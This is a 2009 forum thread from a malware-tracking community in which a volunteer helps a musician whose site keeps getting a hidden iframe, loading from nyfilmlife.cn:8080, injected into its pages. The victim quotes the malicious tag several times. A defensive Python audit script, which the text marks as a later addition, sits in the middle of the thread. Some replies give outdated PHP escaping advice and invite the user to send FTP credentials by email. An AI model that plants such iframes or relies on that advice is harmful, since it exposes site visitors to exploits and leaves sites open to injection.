Malware Domain List

Malware Related => Compromised Servers => Topic started by: kris on June 13, 2009, 04:16:59 pm

Title: It instals it's self in my index.htm file on my website
Post by: kris on June 13, 2009, 04:16:59 pm
Hi guys, I'm new here, just joined today. I hope to find help for the following problem - the following link - it starts with a "<iframe " tag and then goes ----src="http://nyfilmlife.cn:8080/index.php" width=185 height=191 style="visibility: hidden">" ----- and then it ends up with a "</iframe>" tag. It installs itself to my index.htm file on my website and "eats up" 1/3, sometimes 1/2, of my text there. What can I do to make it go away? I erased it a few times but it keeps coming. I wrote to my host but still no response. Thanks for the help in advance. Kris

MysteryFCM: URL disabled
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 13, 2009, 04:36:38 pm
Chances are the code putting it there is in some of your other files.

First and foremost, please replace ALL files on your server with clean copies, and change ALL passwords for your site (including FTP).
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 13, 2009, 04:40:55 pm
Thanks, I'll start with that - changing my password. Why didn't it cross my mind before? I was looking around and all other files seem to be ok. Thanks again, I'll go do it right now. Cheers. Kris
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 13, 2009, 04:50:16 pm
Can you post your site's URL?

If your site uses a database, this will also need checked.

I'd also recommend scouring your site for any files that look suspicious, or have a date on or since, the problem began.
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 13, 2009, 04:56:32 pm
www.krissviconte.com is my modest musician website. I noticed it a few weeks ago. It might have been there before as well. I don't think it has a database.
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 13, 2009, 04:57:50 pm
It always comes to www.krissviconte.com/index.htm and to the identical one krissviconte.com/main.htm --- thanks for your time and effort once again.
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 13, 2009, 05:40:54 pm
Has the site already been cleaned? (not seeing any malicious codes there)

I checked both your .css and .js file, and neither are carrying anything malicious either.
Title: Re: It instals it's self in my index.htm file on my website
Post by: CM_MWR on June 14, 2009, 03:47:14 am
It also appears cleaned from here as well, most curious what they did other than change passwords?
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 14, 2009, 06:37:43 am
Hi,
I just erased the frame line and changed my password - nothing else. Let's see for how long it's going to last. Anyway, Google has registered my website as malicious and every time someone does a search for it (or my name) it shows the link and a warning that it's dangerous to their computer!!! How about that. It will probably take months before they "release me"... Thanks again to all.
Kriss
Title: Re: It instals it's self in my index.htm file on my website
Post by: SysAdMini on June 14, 2009, 09:28:51 am
You can request a review via Google Webmaster Tools.

http://googlewebmastercentral.blogspot.com/2007/08/malware-reviews-via-webmaster-tools.html
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 14, 2009, 03:07:34 pm
Yes, I did request, but now this "thing" is there again. If you go to www.krissviconte.com/index.htm and www.krissviconte.com/main.htm it's there on the last line before the last 2 tags and it has eaten up the last few lines of my text. I wonder, will that change if I change the host server? It happened before on that server that - they say - it was attacked by hackers and my website content was erased completely - just disappeared. I don't want to write this code here because I don't know if I'll transfer it to you that way. It starts with <iframe src="http ....etc and finishes with </iframe>
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 14, 2009, 03:14:17 pm
Quote from: CM_MWR
It also appears cleaned from here as well, most curious what they did other than change passwords?

Hi Steven, now this "thing" is there again - if you have time you can see and tell me how to "kill" it: www.krissviconte.com/index.htm and also on www.krissviconte.com/main.htm
Will that come again if I change the host server and clean everything before that? From the server they're writing me this: "Hi,

Nobody can access your account to make changes to your site without the correct password. If you suspect someone has gained access to your password, you may need to log in at http://www.budgethostingweb.com and change it.

We're sorry we can't find this link or text on the pages you mention. This doesn't happen when we view the pages so it is probably something on your local computer. You may need to check your antivirus software to see if there is a problem there."

and also this: "Hi,

Unfortunately it is possible for spyware on your local computer to steal passwords or manipulate files. We're sorry we don't know if this is the cause or source of your problem, however there have been no unauthorized accesses to our system or your account. We run ironclad security to prevent unauthorized access.

If there is a problem with your site or pages, it has been caused by an upload from a source outside our system, perhaps your local computer.

We're sorry we can't help with problems outside our system. If Firefox is blocking your page, you may need to follow the instructions at:
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.krissviconte.com/"
I'm really confused what to do. I depend on my site so much for my work.
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 14, 2009, 04:27:03 pm
Now I found one file in my base directory that shouldn't be there (I think). It's called Lware.class and I deleted it. I also deleted the "<iframe " thing from both pages - let's see if this was the problem...
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 14, 2009, 05:02:24 pm
I've checked your site again using several different user agents, on the off chance it was trying to hide itself based on that, and I'm afraid I still cannot see anything malicious there.

Have you changed your FTP password already? (prior to its appearing again)

Did you check ALL of the files on your site's FTP server, to ensure all files are those you recognize?

If you answered yes to the above, chances are you've got a keylogger on your machine that keeps sending the attacker the new password and/or the attacker has placed a shell on your site, that you've missed, that will allow them to re-attack your site (these are typically .pl, .asp or .php files).
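
The file review recommended in this post, as an added example that is not part of the original thread: it walks a locally downloaded copy of the site and flags files missing from a list of files you know are yours, files modified since a chosen date, and pages containing an invisible iframe that loads from another host. The function names, the `known_files` list and the placeholder host in the constructed sample page are assumptions for illustration.

```python
import os
from html.parser import HTMLParser
from urllib.parse import urlparse

SCRIPT_EXTS = {".php", ".pl", ".asp", ".class"}  # file types named in the thread
PAGE_EXTS = {".htm", ".html"}

# Constructed sample page: same shape as the injected tag, placeholder host.
SAMPLE_PAGE = ('<html><body><p>Tour dates</p>'
               '<iframe src="http://injected.example:8080/index.php" width=185 '
               'height=191 style="visibility: hidden"></iframe></body></html>')

class IframeFinder(HTMLParser):
    """Collects the src of iframes that are invisible and load from a foreign host."""
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts, self.hits = own_hosts, []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hidden = ("visibility:hidden" in style or "display:none" in style
                  or a.get("width") in ("0", "1") or a.get("height") in ("0", "1"))
        host = urlparse(a.get("src", "")).hostname  # None for relative links
        if hidden and host and host not in self.own_hosts:
            self.hits.append(a["src"])

def hidden_iframes(html, own_hosts):
    finder = IframeFinder(own_hosts)
    finder.feed(html)
    return finder.hits

def audit_copy(root, own_hosts, known_files, since):
    """Return (relative path, reason) findings for a downloaded site copy."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            if rel not in known_files:
                kind = "unknown script/class file" if ext in SCRIPT_EXTS else "unknown file"
                findings.append((rel, kind))
            if os.path.getmtime(path) >= since:  # since: Unix timestamp
                findings.append((rel, "modified since incident began"))
            if ext in PAGE_EXTS:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings += [(rel, "hidden iframe -> " + s)
                                 for s in hidden_iframes(fh.read(), own_hosts)]
    return findings
```

The modification-time check only means something if the download preserved the server's timestamps, so the unknown-file and iframe findings are the more dependable signals.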
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 14, 2009, 05:32:43 pm
It should also be noted, the infection that was present on your site, leads to exploits (PDF etc). As such, if you are doing any of this from the machine you used to load the site - STOP!. Use a clean machine (i.e. one that has not accessed your site since these issues began). Passwords and files etc, should be changed from there.
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 15, 2009, 05:38:47 am
Hi again, you probably didn't find anything because I was in a hurry to delete that Lware.class file and then erase the <iframe line from both places, and since then (last night, 14.6., about 22:00) nothing new has appeared. I also scanned my computer with a few different antivirus programs and cleaned everything that was found even suspicious. Speaking of spyware - could you recommend me some good, reliable and not too expensive one (or why not a free one - even though I doubt that :-) for a private person (I mean I do not own a company with many computers)? I find so many on the net but you are probably aware (from experience) of some really effective ones.
I thank you very much for your time and effort! You're of great help to me and obviously many other people. God bless you!!!
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 15, 2009, 12:53:26 pm
The 2 best antimalware programs are;

a-Squared
www.emsisoft.com

Malwarebytes AntiMalware
www.malwarebytes.org

For additional information, please see;

http://mysteryfcm.co.uk/?mode=Articles&date=12-08-2008
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 15, 2009, 01:11:14 pm
Thanks again !
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 15, 2009, 06:32:06 pm
No problem :)
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 17, 2009, 10:30:28 am
Hi again,
it might be POSSIBLE that all this comes from my machine. I scanned it with the Malwarebytes program and it showed me 96 infected files in the HKU registry - I click the program to remove them but next time they are there again and I can't access my regedit.exe - I go to Start -> Run -> regedit and nothing - then I did change the settings (enable/disable) as I read on the net to make it work, and still nothing. Looks like my machine is very ill.
I just wonder, if there was nothing malicious on my site, how did Google and Firefox mark it as an attacking site - now whenever someone searches for my name it shows a line next to my URL - this site is dangerous for your computer.
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 17, 2009, 03:55:21 pm
Google etc, would have picked it up when the malicious code was there (i.e. prior to your removing it).

I'd strongly advise you stop by the Malwarebytes forums as they'll be able to help you clean out the infections.
Title: Re: It instals it's self in my index.htm file on my website
Post by: Serg on June 17, 2009, 09:02:27 pm
Nice. When you find malware, please post its md5 here. I want to find the admin page for that...
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 18, 2009, 07:52:37 am
Hi again, the frame code that appears on my "index.htm" and my "main.htm" pages is here: it starts with a "<iframe " tag and then goes ----src=(Quotes")http : // nyfilmlife.cn:8080/index.php" width=185 height=191 style="visibility: hidden">" ----- and then it ends up with a "</iframe>" tag -- I have also posted it before in my previous postings. I cleaned my site and Google and Firefox are not blocking my site anymore and they don't show the warning when someone searches for kriss viconte on Google.
But my site was clean for only (not even) 2 days!!! I changed my password and cleaned all the <frame codes from my telephone with my WLAN Wi-Fi connection. Last night I found that frame again and I haven't accessed my account for at least 36 hours since it was clean. Before I fixed it - the last time - there were also some *.class files missing from my Java Anfy applet and I have never erased any of them. Now I have renamed my index.htm and main.htm files because I don't want Google to report my site as malicious again and I will look for a new host. I think that host is not strong enough to protect me from someone getting into my account and modifying my files. ??? Am I right? ???
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 18, 2009, 06:25:03 pm
When you changed your password last time, did you do so from a non-compromised machine?

You MUST ensure;

1. Passwords are changed from a non-infected machine
2. No shells were placed on the server by the attacker, to let them back into the site even if they can't get the current FTP password
3. Any files on your server that allow user input (e.g. via forms), are using proper sanitization to prevent injection and the like, for example, if you currently use;

Code:
$email = $_GET['mail'];
Where GET is either GET for querystrings, or POST for post method strings

Is changed to;

Code:
$email = $_GET['mail'];
$email = addslashes(htmlentities($email, ENT_QUOTES));
And ensure use of mysql_real_escape_string if you're using MySQL.

/edit

Just a note, the best way of ensuring #2 is to delete all files currently on the server, and uploading a clean copy from a backup (assuming you have one), and again, uploading them from a clean computer (otherwise all they'll need to do is wait for you to connect to your site's FTP again, and sniff the password again).

You should also ensure ALL passwords are alpha numeric with special characters, and do NOT use full words (e.g. "m$98'$"kjh£$KJ" instead of "mydoggy8ate0my2breakfast"). Password crackers will crack passwords with full words in them, in a matter of seconds/minutes usually.
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 18, 2009, 06:31:17 pm
Please also ensure you pop over to either of the following, to ensure your machine is properly cleaned up;

http://malwarebytes.org/forums

or;

http://malwarecrypt.com/forumdisplay.php?f=4
Title: Re: It instals it's self in my index.htm file on my website
Post by: kris on June 19, 2009, 11:24:14 am
Hi Steven, if I give you my username and password would you go to my account - base directory - and look at all the files there, when you have time? I don't really know what a "shell" is and where to look for it - is it a separate file or is it "implemented" in some of the other files and sort of hidden? I have looked at all my files there and, except for the "Lwarere.class" I removed, all the others are my own.
I changed my password last time from my phone internet connection - it's supposed to be clean, I hope - and deliberately didn't visit my account just to see if it's going to happen again. I'm about to change to a new server, to a new host, but I'm afraid it will happen there too - that's why I'm so eager to find out how exactly this happens and how to prevent it. As it looks like it's not so much my server's fault. But still, when I did my last backup with FileZilla I had to use my oldest password, which means my FTP password doesn't change automatically when I change my account password. On the other hand, the host doesn't give me an option to change my FTP password separately. They say connect to the FTP server using your account password, but if I connect with FileZilla it works only with my old password.
One other thing gives me a BIG QUESTION MARK??? - who would want to do this to me - I wonder who wants to screw up my website?!? I have no such enemies... ???
And last but not less important - Steven, I can't thank you enough for what you're doing for me. Thanks for all your time and good heart. Kriss

P/S and now I remember that I have this function of Windows remembering my passwords enabled - but of course not for the last ones of my website host account - should I disable this function as well - completely?
Title: Re: It instals it's self in my index.htm file on my website
Post by: MysteryFCM on June 19, 2009, 01:47:55 pm
Quote from: kris
Hi Steven, if I give you my username and password would you go to my account - base directory - and look at all the files there, when you have time? I don't really know what a "shell" is and where to look for it - is it a separate file or is it "implemented" in some of the other files and sort of hidden? I have looked at all my files there and, except for the "Lwarere.class" I removed, all the others are my own.

I'll be more than happy to do so, yes, but please don't post them here. Instead either PM the account details (I'll need the FTP hostname, username and password) to me, or send them to me via e-mail (mdl_users @ it-mate.co.uk).

Quote from: kris
But still, when I did my last backup with FileZilla I had to use my oldest password, which means my FTP password doesn't change automatically when I change my account password. On the other hand, the host doesn't give me an option to change my FTP password separately. They say connect to the FTP server using your account password, but if I connect with FileZilla it works only with my old password.

If changing your account password did not change your FTP password as well, then that will be how they got back in, which means, until the FTP password itself is changed, they'll be able to keep doing this (your host should be providing a facility to change the FTP password). If your host is telling you to connect to FTP using the account password, but you are only able to do such using the old password, you MUST inform them of this as soon as possible as they are the only ones that have the relevant facilities to look into and resolve this for you.

Quote from: kris
One other thing gives me a BIG QUESTION MARK??? - who would want to do this to me - I wonder who wants to screw up my website?!? I have no such enemies... ???

The good thing, and not much comfort, is that this is not personal - they aren't targeting you directly or personally. They do this specifically to make more money for themselves, that is their ultimate goal, they don't care who they step on to do such.

Quote from: kris
And last but not less important - Steven, I can't thank you enough for what you're doing for me. Thanks for all your time and good heart. Kriss

It's a pleasure :)

Quote from: kris
P/S and now I remember that I have this function of Windows remembering my passwords enabled - but of course not for the last ones of my website host account - should I disable this function as well - completely?

I'd very strongly recommend disabling that, yes.